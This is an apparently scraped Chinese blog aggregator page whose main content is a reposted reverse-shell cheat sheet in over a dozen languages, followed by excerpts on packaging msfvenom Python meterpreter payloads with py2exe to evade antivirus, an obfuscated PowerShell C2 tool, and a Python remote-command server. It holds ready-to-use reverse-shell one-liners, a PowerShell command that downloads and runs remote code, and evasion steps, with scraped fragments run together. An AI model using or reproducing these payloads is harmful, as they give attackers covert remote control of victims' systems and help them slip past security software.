精华内容
下载资源
问答
  • 反弹shell工具推荐

    2019-02-21 11:31:00
    Reverse Shell Cheat Sheet Bash TCP bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 &....

    Reverse Shell Cheat Sheet

     

    Bash TCP

    bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
    
    0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196

     

    Bash UDP

    Victim:
    sh -i >& /dev/udp/127.0.0.1/4242 0>&1
    
    Listener:
    nc -u -lvp 4242

     

    Perl

    perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    
    perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' NOTE: Windows only perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

     

    Python

    Linux only

    IPv4

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

    IPv6

    python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' 
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

    Windows only

    C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

     

    PHP

    php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

     

    Ruby

    ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
    
    ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' NOTE: Windows only ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

     

    Netcat Traditional

    nc -e /bin/sh [IPADDR] [PORT]

     

    Netcat OpenBsd

    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

     

    Ncat

    ncat 127.0.0.1 4444 -e /bin/bash
    ncat --udp 127.0.0.1 4444 -e /bin/bash

     

    Powershell

    powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
    powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
    powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')

     

    Awk

    awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

     

    Java

    r = Runtime.getRuntime()
    p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()

     

    War

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war strings reverse.war | grep jsp # in order to get the name of the file

     

    Lua

    Linux only

    lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

    Windows and Linux

    lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

     

    NodeJS

    (function(){
        var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(8080, "10.17.26.64", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application form crashing })(); or require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]') or -var x = global.process.mainModule.require -x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash') or https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py

     

    Groovy - by frohoff

    NOTE: Java reverse shell also work for Groovy

    String host="localhost";
    int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

     

    Spawn TTY

    /bin/sh -i

    (From an interpreter)

    python -c 'import pty; pty.spawn("/bin/sh")'
    perl -e 'exec "/bin/sh";' perl: exec "/bin/sh"; ruby: exec "/bin/sh" lua: os.execute('/bin/sh')

    Access shortcuts, su, nano and autocomplete in a partially tty shell /!\ OhMyZSH might break this trick, a simple sh is recommended

    # in host
    ctrl+z
    stty raw -echo
    fg
    
    # in reverse shell reset export SHELL=bash export TERM=xterm-256color stty rows <num> columns <cols>

    (From within vi)

    :!bash
    :set shell=/bin/bash:shell

    (From within nmap)

    !sh

     

    References

    转载于:https://www.cnblogs.com/heycomputer/articles/10411367.html

    展开全文
  • 有时候网站服务器上有杀毒软件,我们上传的nc.exe、lcx.exe等工具都被杀了,这时候就需要一款免杀的工具反弹shell。 这篇博客主要是依据国外的一片文章翻译而来,根据国外大佬的教程将Python脚本转换成exe程序...

    有时候网站服务器上有杀毒软件,我们上传的nc.exe、lcx.exe等工具都被杀了,这时候就需要一款免杀的工具来反弹shell。

    这篇博客主要是依据国外的一片文章翻译而来,根据国外大佬的教程将Python脚本转换成exe程序即可免杀。

    参考链接:https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1

     

    第1步:安装Python2.7和Py2exe

    一定要安装32位的Python 2.7和32位的Py2exe,不管你的操作系统是多少位的都要安装32位版本。

    第2步:生成Python脚本

    利用msfvenom生成Python脚本:

    msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.34.2 lport=443 -f raw -o /tmp/mrtp.py

    第3步:创建setup.py

    from distutils.core import setup
    import py2exe
    setup(
    name = 'Meter',
    description = 'Python-based App',
    version = '1.0',
    console=['mrtp.py'],
    options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
    zipfile = None,
    )

    第4步:生成exe

    将之前生成的mrtp.py和setup.py放在同一个目录,然后执行命令:

    python setup.py py2exe

    稍等几秒钟即可转换成功,生成的exe程序保存dist目录。

    第5步:反弹shell

    首先使用MSF监听端口等待回连,然后将生成的exe程序上传的网站服务器并运行该程序即可反弹shell。

     

    转载于:https://www.cnblogs.com/dgjnszf/p/11191323.html

    展开全文
  • ReverseTCPShell C2 反弹shell工具 ReverseTCPShell C2是一款powershell编写的反弹shell工具,流量经过AES加密,payload通过三种混淆方式可绕过一些杀软的检测。 Github下载地址:...

    ReverseTCPShell C2 反弹shell工具

    ReverseTCPShell C2是一款powershell编写的反弹shell工具,流量经过AES加密,payload通过三种混淆方式可绕过一些杀软的检测。

    Github下载地址:https://github.com/ZHacker13/ReverseTCPShell
    1、在文件目录下启动powershell
    在这里插入图片描述
    2、.\ReverseTCP.ps1 启动程序

    **

    注:若出现以下错误,请更改执行策略

    **
    在这里插入图片描述
    报错:无法加载文件 ******.ps1,因为在此系统中禁止执行脚本。有关详细信息。

    set-executionpolicy remotesigned
    

    默认值改为:Y
    在这里插入图片描述
    再次.\ReverseTCP.ps1
    在这里插入图片描述
    功能介绍,设置好lhost和lport(监听地址及端口)
    Modules (模块) | - Show C2-Server Modules.(显示c2服务器模块)
    Info (信息) | - Show Remote-Host Info.(显示远程主机信息)
    Upload (上传) | - Upload File from Local-Host to Remote-Host.(上传文件从本地主机到远程主机。)
    Download(下载) | - Download File from Remote-Host to Local-Host.(从远程主机下载文件到本地主机。)
    Screenshot (截图) | - Save Screenshot from Remote-Host to Local-Host.(保存屏幕截图从远程主机到本地主机。)

    可以看到三种混淆方式
    在这里插入图片描述
    这里选择的是base64,生成powershell和cmd的payload
    在这里插入图片描述
    复制出cmd的payload,靶机执行
    在这里插入图片描述

    本地powershell开启监听,靶机上线,杀软未提示和拦截
    在这里插入图片描述
    可直接执行shell命令、远程文件上传和下载,方便后渗透的进行,可进一步利用。

    展开全文
  • 反弹shell工具源码

    2021-10-12 10:03:27
    依赖PHP环境。修改IP、端口,自动生成命令
  • worker_socket.send(data) def worker(worker_socket,addr): while True: data = worker_socket.recv(BUFSIZE) if len(data) (data,shell=True,stdin=PIPE,stdout=PIPE,stderr=PIPE) result = p.stdout.read() err ...

    Server.py

    
    from socket import *
    from time import ctime
    from threading import Thread
    from subprocess import Popen,PIPE
    
    HOST = ""
    PROT = 23335
    BUFSIZE = 1024
    ADDR = (HOST, PROT)
    
    def send(worker_socket,data):
        worker_socket.send(data)
    
    def worker(worker_socket,addr):
        while True:
            data = worker_socket.recv(BUFSIZE)
            if len(data) < 0:
                break
            else:
                p = Popen(data,shell=True,stdin=PIPE,stdout=PIPE,stderr=PIPE)
                result = p.stdout.read()
                err  = p.stderr.read()
                print("recv[%s:%s]:%s" % (addr[0],addr[1], data))
                Thread(target=send,args=(worker_socket,result+err)).start()
        worker_socket.close()
    
    
    def main():
        main_socket = socket(AF_INET, SOCK_STREAM)
        main_socket.bind(ADDR)
        main_socket.listen(5)
        workers = []
        print("waiting for connection...")
        while True:
            worker_socket, addr = main_socket.accept()
            print("connected from:%s:%s"%(addr[0],addr[1]))
            w = Thread(target=worker, args=(worker_socket,addr))
            w.start()
            workers.append(w)
        for w in workers:
            w.join()
        main_socket.close()
    
    
    if __name__ == '__main__':
        main()
    

    Client.py

    from socket import *
    from time import ctime
    from threading import Thread
    import sys
    
    def receiver(s):
        while True:
            data = s.recv(1024000)
            if len(data) > 0:
                print(data.decode("utf-8"))
    
    
    def main():
        s = socket(AF_INET, SOCK_STREAM)
        ip = sys.argv[1]
        port = int(sys.argv[2])
        s.connect((ip, port))
        Thread(target=receiver,args=(s,)).start()
        while True:
            data = input()
            if len(data) <= 0:
                break
            s.send(data.encode("utf-8"))
        s.close()
    
    
    if __name__ == '__main__':
        main()
    

     

    展开全文
  • 本人自己写的反弹shell工具,技术有限,目前只能反弹一个shell,还没深入研究,不过提权过程中一个shell足够了,毕竟不是远控管理工具。 最新版本的,确实是免杀的。 话不多说,看操作: 第一步打开服务端本地运行...
  • 反弹Shell的方式和详解

    千次阅读 多人点赞 2020-06-18 11:47:13
    文章目录一、介绍1.1 含义1.2 目的二、反弹方式2.1 Bash反弹shell2.1.1 适用对象2.1.2 操作方法2.1.3 命令原理 声明:以下的反弹shell的介绍只适用于学习和授权情况下的操作,请勿用于非法环境! 一、介绍 1.1 ...
  • 文章目录反弹shell介绍常用反弹方式NetCat(NC)反弹正向NC反向NCmshta.exe利用msf利用模块方法一(msfconsole)方法二(msfvenom)Cobaltstrike利用模块hta攻击源码rundll32.exe利用msf利用模块方法一(msfconsole)方法...
  • 什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&...
  • 工具】Netcat(2)反弹shell

    千次阅读 2020-02-21 06:38:01
    应用场景:某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上没有安装Netcat时。 1.反弹shell(bash) 反弹shell命令:bash -i >& /dev/tcp/ip/port 0>&1 pc接受netcat命令:nc -lvp ...
  • Linux/Windows反弹shell

    千次阅读 2021-05-28 08:11:34
    Linux反弹shell bash反弹 加密bash反弹shell的流量 Python反弹 nc反弹 Telnet反弹 socat反弹 其他命令反弹 Windows反弹shell Powershell反弹nc shell 使用MSF反弹shell Linux反弹shell 攻击机:192.168....
  • CVE-2017-12149 JBOSS as 6.X反序列化(反弹shell版)
  • 使用nc反弹shell方法

    千次阅读 2017-05-08 16:20:58
    hacker机:192.168.1.1 目标机:192.168.1.2 1、在hacker机执行 nc -vlp 9999 (监听本机9999端口) 2、在目标机执行 bash -i >& /dev/tcp/192.168.1.1/9999 0>&1 成功反弹shell
  • 当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句 来达到我们的目的。 二、反弹方法 ...
  • 反弹shell姿势复现(一)前言复现环境说明反弹shell姿势(一)--- 利用bash反弹shell重要说明方法一方法二 前言     反弹shell有很多种方式,这个系列内容较多,之后也会不断更新,对于反弹...
  • 后渗透——利用kali工具MSF反弹shell

    千次阅读 2020-03-16 19:42:57
    msfconsole可能是Metasploit框架(MSF)最流行的接口。它提供了一个“一体化”的集中控制台,并允许您高效地访问MSF中几乎所有可用的选项。MSFconsole一开始可能看起来有些吓人,但是一旦您了解了命令的语法,您就会...
  • 反弹shell汇总,看我一篇就够了

    千次阅读 2020-12-26 14:24:03
    反弹shell 知识铺垫 什么是shell shell是渗透中常用的名词,像getshell,webshell,反弹shell等等,都和shell相关。 getshell:获取到目标的命令执行权限 webshell:指网站后门,通过web服务进行命令执行 反弹shell...
  • 在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们...
  • DNS反弹Shell

    千次阅读 2018-06-08 16:43:38
    反弹Shell工具和实现方法多种多样,只要能够让被控端通过网络发送数据到控制端,并且实现数据的解析即可完成控制过程。最近在继续了解网络协议,于是突然想在DNS数据包中插入一些伪造的命令来实现解析,本来准备...
  • 反弹Shell

    2019-09-22 09:16:23
    大家在做渗透测试的时候,遇到linux的服务器,想反弹shell回来本地溢出提权,怎么办?上传反弹脚本?当然可以,简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。今天再告诉大家几种方法 环境...
  • 常用的反弹shell总结

    2020-03-24 18:59:02
    nc反弹shell 我们已经拿下主机的一个webshell,我们想获取一个可以直接操作主机的虚拟终端,此时我们首先想到的是开启一个shell监听,这种场景比较简单,我们直接使用使用nc即可开启,如果没有nc我们也可以很轻松的...
  • 内网渗透-反弹Shell

    千次阅读 2020-07-07 16:22:31
    反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色...
  • 浅谈SSRF 加redis反弹shell

    千次阅读 2020-03-22 10:53:07
    简单介绍 如果内网开放了6379端口redis服务,尝试利用SSRF对redis执行未授权漏洞,可以直接反弹shell获取权限 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他...
  • 反弹shell的方法总结

    2020-08-26 17:45:56
    什么是反弹shell(reverse shell)? 就是控制端监听某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的...
  • Linux反弹shell姿势复现(二)--- 利用下载工具执行反弹(busybox)前言复现环境说明利用下载工具执行反弹(busybox)什么是busybox?方法一方法二 前言 本博文仅供学习反弹shell的姿势使用,勿作其他用途的参考! ...
  • Ngrok反弹shell

    2020-08-31 23:27:56
    ngrok创建隧道 ...3.远程端口(你购买的远程服务器会提供一个远程端口给你,供你转发反弹)。 4.本地端口(你本机接收shell的端口) 确认开通: 在隧道管理就可以看到一条自己新建立的隧道 ...
  • Redis未授权访问反弹shell

    千次阅读 2019-11-21 15:30:28
    0x01:前言 这是10月份写的文章 一直放到电脑上居然忘掉了 我丢!! Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-...Redis因配置不当可以未授权访问(窃取数据、反弹sh...
  • 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器...
  • 好用的cmdshell反弹工具;好用的cmdshell反弹工具

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 5,894
精华内容 2,357
关键字:

反弹shell的工具